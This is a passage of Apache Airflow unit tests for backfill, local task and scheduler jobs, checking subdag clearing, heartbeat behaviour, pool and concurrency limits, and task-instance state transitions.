def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
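# _DagRunTaskStatus tracks the running/succeeded/skipped/failed/to_run buckets
# that _update_counters moves task instances between in the checks below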
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
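# the TI's recorded hostname ("blablabla") does not match this machine,
# so the heartbeat callback is expected to raise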
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
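# poll for up to ~5 seconds (50 x 0.1s) for the task to reach RUNNING
# before flipping it to SUCCESS externally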
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
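# the TI is already recorded as RUNNING on this host with pid 1, so a second
# LocalTaskJob should refuse to start the task runner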
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
with create_session() as session:
session.query(models.DagRun).delete()
session.query(errors.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type dags_folder: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
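# the backfill-run TI should be excluded; only the TI without a dagrun and
# the one belonging to the regular dag run are executable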
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
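# pool 'a' has a single slot, so only one of the two task1 instances can be
# picked; pool 'b' has 100 slots, so both task2 instances qualify -> 3 in total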
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
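# dag concurrency is 2 and ti1 is already RUNNING, so only one of the two
# SCHEDULED instances can be picked up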
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
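# nothing is running yet, so both scheduled instances fit within the dag
# concurrency (16) and task1's task_concurrency (2) limits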
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
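# the state filter is [State.RUNNING] while all three TIs are SCHEDULED, so
# presumably none of them matches and nothing should be returned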
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
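# only the TIs whose current state is in [NONE, SCHEDULED] (ti1 and ti3)
# should be moved to QUEUED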
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# it is important that len(tasks) is less than concurrency:
# previously scheduler._execute_task_instances would only check the number
# of tasks once, so with a concurrency of 3 we could execute arbitrarily
# many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# it is important that len(tasks) is less than concurrency:
# previously scheduler._execute_task_instances would only check the number
# of tasks once, so with a concurrency of 3 we could execute arbitrarily
# many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
